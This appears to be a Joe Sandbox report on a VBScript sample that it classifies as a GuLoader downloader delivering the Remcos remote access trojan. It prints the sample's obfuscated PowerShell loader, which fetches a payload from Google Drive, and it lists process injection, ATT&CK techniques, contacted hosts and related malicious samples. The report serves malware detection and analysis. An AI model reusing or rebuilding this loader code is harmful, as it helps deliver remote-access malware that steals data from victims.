i0 enc doe(attaw angicompn ynkdop rov.trwfangs spr s.rindioxtfaca misa1t ta0cruc.dile0hjem;genl unpewvulginedknradi6tilb4bybu;sp l k igx nap6graf4mu t; ndt frormontvskib:t mm1past3 den4 trl.unmo0fal )a la forsg knaemigrcoophkger,ofjl./ar.e2unr 0 v n1zair0peri0skab1benz0phys1ran plefclasi mstrflaweseksfuopdo allxpala/du,n1 .nt3hjul4rall.gibb0';$gyldigheder=raspite 'formusocispo aekibbrinst-hr,eanobigextrefordnbi et';$reaccepted=raspite 'opdrhpaaktuordt e,cp actsport:b,ro/vldi/ la,dudsor c.ciudvivintae sid.car g dskorag o th gfeeblp eseudpa.outwc emeosnnemb se/omn,u ankc unq?muskesignx i,rp ormoa rer bo tk rn=.dspdhensot,ylw datnsavnlpolyokonta.occdpree& biginajad gru=b rn1 for2vedlo amapindf5sho.as ymslodnibathysdcextemae.abrkundeohairntes 8 sniaaga z,fvevvend9u pedolivtm ttsov r0domfsundljtranh spijhypnubo lxorthjtapptlrlisterrm';$genette=raspite 'loph>';$optimalvaerdi=raspite 'forui d nechlox';$trafikkens='amfibietanken';$unphilosophize47='\unapplauding.ove';xanthorrhiza (raspite 'stre$ fsgbomblem.go kr,b ranandtelkut :minygstumrratiobrevwkapalhp te ondddiff9af,j6 myl=g.rt$ tilesku.ndaugv c b:somnaslu pcommp ardd flyabondt ediasupe+ exc$sammustranint,pnonph difiponyl supotopus proo rnepnonshsa tidmpezvolie chl4kerm7');xanthorrhiza (raspite 'udst$ fjeg,hril ingo afsb ostarisplfrdi:berbeshusr ectydrontbimah mesrgeneospatcmascyt avt ompe vi sbrdd=,ors$probr fore sala undcbag creveeamorphysttautoetuscdsond.solosalleprebolgl sibakktstik(foot$ kidgbirteavilnclube spatrepatrepue coq)');xanthorrhiza (raspite $hematohidrosis);$reaccepted=$erythrocytes[0];$beregningsgrundlag=(raspite 'helb$turigpi gl keno gribmaxiaabmhlregn:,peckhe dns goino dpstallnonsiunsin virgunanskabekpreljfritopa.tl,xfoelysonindds fin=ki,bnweasesalvw lnk-quo,o bumbs.spj,rbaelodgcgiggt doo sunfsbrouy recs hawtflukepartminv,.poly$c,mpsdobbpstopa ngalkatatslamehemodtromeantifjumbi metnegadikl.mtprovimalmovrdin cigeun rn');xanthorrhiza ($beregningsgrundlag);xanthorrhiza (raspite 's bi$ valkgen,nundeibol
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $elselskaber;function xanthorrhiza($diagnostikkernes){ .($optimalvaerdi) ($diagnostikkernes)} function raspite($ambivalentes){$smaabarnsalderen=4;do{$summker+=$ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$skaberaktapirer=format-list} until(!$ambivalentes[$smaabarnsalderen])$summker}$spaltedefinitionen=raspite ' ndnhjlpem thtthra.lesiw';$spaltedefinitionen+=raspite 'masteb,reb di cteralsl giassiebeh,n irt';$choremen=raspite 'ro fm forosa,izgagsimpanlunc lant ademe/';$polytungstate=raspite 'sanitgogolstifs agu1 afs2';$hematohidrosis='inve[no.nnslute rabt k l.anthsunexe,essrquinvmillitolacmillestraptrido pericontnopsut udvmom,ia s lnorgaa b,rgbeg,estemrka,e]f,rf:duch:h.pos hijeph,ecudfrusnekrprotiincot.araybuckpflotrsky ovolttko gofor ctriao ortlwar =taag$statp puno grilneu yempetgoo uoec nsmregtills shatsv daovertprope';$choremen+=raspite 'rets5lede.de i0 enc doe(attaw angicompn ynkdop rov.trwfangs spr s.rindioxtfaca misa1t ta0cruc.dile0hjem;genl unpewvulginedknradi6tilb4bybu;sp l k igx nap6graf4mu t; ndt frormontvskib:t mm1past3 den4 trl.unmo0fal )a la forsg knaemigrcoophkger,ofjl./ar.e2unr 0 v n1zair0peri0skab1benz0phys1ran plefclasi mstrflaweseksfuopdo allxpala/du,n1 .nt3hjul4rall.gibb0';$gyldigheder=raspite 'formusocispo aekibbrinst-hr,eanobigextrefordnbi et';$reaccepted=raspite 'opdrhpaaktuordt e,cp actsport:b,ro/vldi/ la,dudsor c.ciudvivintae sid.car g dskorag o th gfeeblp eseudpa.outwc emeosnnemb se/omn,u ankc unq?muskesignx i,rp ormoa rer bo tk rn=.dspdhensot,ylw datnsavnlpolyokonta.occdpree& biginajad gru=b rn1 for2vedlo amapindf5sho.as ymslodnibathysdcextemae.abrkundeohairntes 8 sniaaga z,fvevvend9u pedolivtm ttsov r0domfsundljtranh spijhypnubo lxorthjtapptlrlisterrm';$genette=raspite 'loph>';$optimalvaerdi=raspite 'forui d nechlox';$trafikkens='amfibietanken';$unphilosophize47='\unapplauding.ove';xanthorrhiza (raspite 'stre$ fsgbomblem.go kr,b ranandtelkut :minygstumrratiobrevwkapalhp te ondddiff9af,j6 myl=g.rt$ tilesku.ndaugv c b:somnaslu pcommp ardd flyabondt ediasupe+ exc$sammustranint,pnonph difiponyl supotopus proo rnepnonshsa tidmpezvolie chl4kerm7');xanthorrhiza (raspite 'udst$ fjeg,hril ingo afsb ostarisplfrdi:berbeshusr ectydrontbimah mesrgeneospatcmascyt avt ompe vi sbrdd=,ors$probr fore sala undcbag creveeamorphysttautoetuscdsond.solosalleprebolgl sibakktstik(foot$ kidgbirteavilnclube spatrepatrepue coq)');xanthorrhiza (raspite $hematohidrosis);$reaccepted=$erythrocytes[0];$beregningsgrundlag=(raspite 'helb$turigpi gl keno gribmaxiaabmhlregn:,peckhe dns goino dpstallnonsiunsin virgunanskabekpreljfritopa.tl,xfoelysonindds fin=ki,bnweasesalvw lnk-quo,o bumbs.spj,rbaelodgcgiggt doo sunfsbrouy recs hawtflukepartminv,.poly$c,mpsdobbpstopa ngalkatatslamehemodtromeantifjumbi metnegadikl.mtprovimalmovrdin cigeun rn');xanthorrhiza ($beregningsgrundlag);xanthorrhiza (raspite 's bi$ valkgen,nundeibolJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4752, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-EOQLI8Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4752, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              Remote System Discovery              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634191 Sample: Document BT24#U00b7pdf.vbs Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 29 drive.usercontent.google.com 2->29 31 drive.google.com 2->31 33 Host_6637.6637.6637.657e 2->33 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected GuLoader 2->47 49 7 other signatures 2->49 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        13 msiexec.exe 2->13         started        signatures3 process4 signatures5 51 VBScript performs obfuscated calls to suspicious functions 8->51 53 Suspicious powershell command line found 8->53 55 Wscript starts Powershell (via cmd or directly) 8->55 65 3 other signatures 8->65 15 powershell.exe 14 20 8->15         started        19 PING.EXE 1 8->19         started        57 Early bird code injection technique detected 11->57 59 Writes to foreign memory regions 11->59 61 Found suspicious powershell code related to unpacking or dynamic code loading 11->61 63 Queues an APC in another process (thread injection) 11->63 21 msiexec.exe 6 11->21         started        23 conhost.exe 11->23         started        process6 dnsIp7 35 drive.google.com 142.250.181.238, 443, 49707, 49708 GOOGLEUS United States 15->35 37 drive.usercontent.google.com 172.217.16.193, 443, 49709, 49717 GOOGLEUS United States 15->37 39 Found suspicious powershell code related to unpacking or dynamic code loading 15->39 25 conhost.exe 15->25         started        27 conhost.exe 19->27         started        41 Detected Remcos RAT 21->41 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Document BT24#U00b7pdf.vbs15%VirustotalBrowse
              Document BT24#U00b7pdf.vbs18%ReversingLabsScript-WScript.Trojan.Guloader

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://drive.usercontent.google.com(0%Avira URL Cloudsafe
              https://go.microsoft.co0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		142.250.181.238
              		truefalse
                		high
                drive.usercontent.google.com
                		172.217.16.193
                		truefalse
                  		high
                  Host_6637.6637.6637.657e
                  		unknown
                  		unknownfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.google.compowershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://drive.usercontent.google.compowershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.microsoft.copowershell.exe, 00000003.00000002.1590762513.0000026D744A2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.1952137250.0000000004A21000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.google.com(powershell.exe, 00000003.00000002.1536459249.0000026D00BBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://drive.usercontent.google.com/%msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://drive.google.com/qmsiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.1582725505.0000026D10079000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.google.compowershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D0057B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.usercontent.google.compowershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.usercontent.google.com/zmsiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://drive.google.compowershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.1536459249.0000026D00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://apis.google.compowershell.exe, 00000003.00000002.1536459249.0000026D005A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D00580000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1536459249.0000026D005A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2178021460.00000000075EC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2222859365.00000000075E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113833968.000000000762B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2113645596.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2177947972.00000000075E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1536459249.0000026D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1952137250.0000000004A21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.vpowershell.exe, 00000003.00000002.1590762513.0000026D74440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1536459249.0000026D00227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                142.250.181.238
                                                                		drive.google.comUnited States
                                                                		15169GOOGLEUSfalse
                                                                172.217.16.193
                                                                		drive.usercontent.google.comUnited States
                                                                		15169GOOGLEUSfalse

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1634191
                                                                Start date and time:2025-03-10 20:36:44 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 47s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:21
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Document BT24#U00b7pdf.vbs
                                                                renamed because original name is a hash value
                                                                Original Sample Name:Document BT24pdf.vbs
                                                                Detection:MAL
                                                                Classification:mal100.troj.expl.evad.winVBS@12/7@3/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 80%
                                                                • Number of executed functions: 43
                                                                • Number of non-executed functions: 5
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .vbs

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, consent.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50, 150.171.27.10, 172.202.163.200
                                                                • Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 2112 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7624 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                15:37:38API Interceptor152x Sleep call for process: powershell.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                No context

                                                                Domains

                                                                No context

                                                                ASNs

                                                                No context

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0eq2e132qweertgd.exe.bin.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                lalaloopy.htaGet hashmaliciousUnknownBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                SNKO05B241100201.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                SNKO05B241100201..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                SNKO05B241100201.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                Inst#U0430ll.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                sNtelKBdvr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                B599ZYjsg4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                LdksctiMff.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                37f463bf4616ecd445d4a1937da06e19rgk62zzDVd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                pgsAuwtaJ4.exeGet hashmaliciousGuLoaderBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                ESrG8c98zz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                ZS0Uo8zwGk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                LhMU00WNoQ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                LdksctiMff.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                UWCCivkQKO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                ResPencil.5.6.1.exeGet hashmaliciousUnknownBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                QUo9fr3nQW.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193
                                                                Z4nC253E8n.exeGet hashmaliciousUnknownBrowse
                                                                • 142.250.181.238
                                                                • 172.217.16.193

